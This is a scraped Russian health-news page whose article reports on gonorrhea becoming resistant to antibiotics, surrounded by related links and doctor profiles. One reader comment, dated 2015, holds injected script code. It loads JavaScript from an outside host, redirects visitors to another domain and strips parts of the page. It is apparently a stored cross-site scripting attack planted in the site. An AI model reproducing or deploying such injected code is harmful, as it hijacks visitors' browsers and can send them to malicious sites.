Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Инфекция, передаваемая по...  >>  Инфекция, передаваемая половым путем, больше не лечится
 
Обратная связь
 

Инфекция, передаваемая половым путем, больше не лечится

Размер шрифта
19 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Еще совсем недавно самые распространенные инфекции, передаваемые половым путем – гонорея и хламидиоз, легко поддавались лечению антибиотиками. Однако в последнее время гонорея все реже поддается лечению.

 Инфекция, передаваемая половым путем, больше не лечится

Гонорея является одной из самых распространенных инфекций, передаваемых половым путем, причем многие люди не знают о том, что они заражены в связи с бессимптомным течением заболевания. При отсутствии лечения гонорея может привести к воспалению тазовой брюшины, тяжелым осложнениям при беременности и женскому бесплодию.

История устойчивости гонококков к лечению берет начало в 40-х годах XX века, когда они потеряли чувствительность к сульфаниламидным препаратам. Затем, в 70-х и 80-х годах, последовали пенициллины и тетрациклины, а в 2007 г. – фторхинолоны. До настоящего момента оставалась только одна группа антибиотиков, которые были эффективны при гонорее, – цефалоспорины. Но и они постепенно теряют эффективность.

Первые данные об устойчивости гонококков к пероральному цефалоспорину – цефиксиму – появились несколько лет назад в Японии. Затем эта тенденция стала наблюдаться в Европе, а потом и в Северной Америке. В настоящем исследовании лечение было неэффективно у 9 из 133 пациентов (6,77%) с гонореей.

В связи с возрастающей устойчивостью гонококков рекомендуется назначать пациентам инъекцию цефтриаксона в сочетании с недельным курсом перорального антибиотика – азитромицина или доксициклина.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Причина вашего бесплодия в вашей еде!   10 мифов о бесплодии   Замороженная сперма спасет от бесплодия   Бесплодие. Мужчины  
25 июля 2012Скоро мы сможем восстанавливаться после травм как ящерицы! 24 июля 2012Организм матери считает плод чужеродным элементом!
 
07 июня 2012Участились случаи гонореи, устойчивой к антибиотикам 08 августа 2011Сперма мышей вылечит бесплодие
 

Слайдшоу

1
Главные причины депрессии и как от них избавиться
Как понять, что вы бесплодны
Как победить бесплодие?

Тесты

Яички – удивительный орган
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.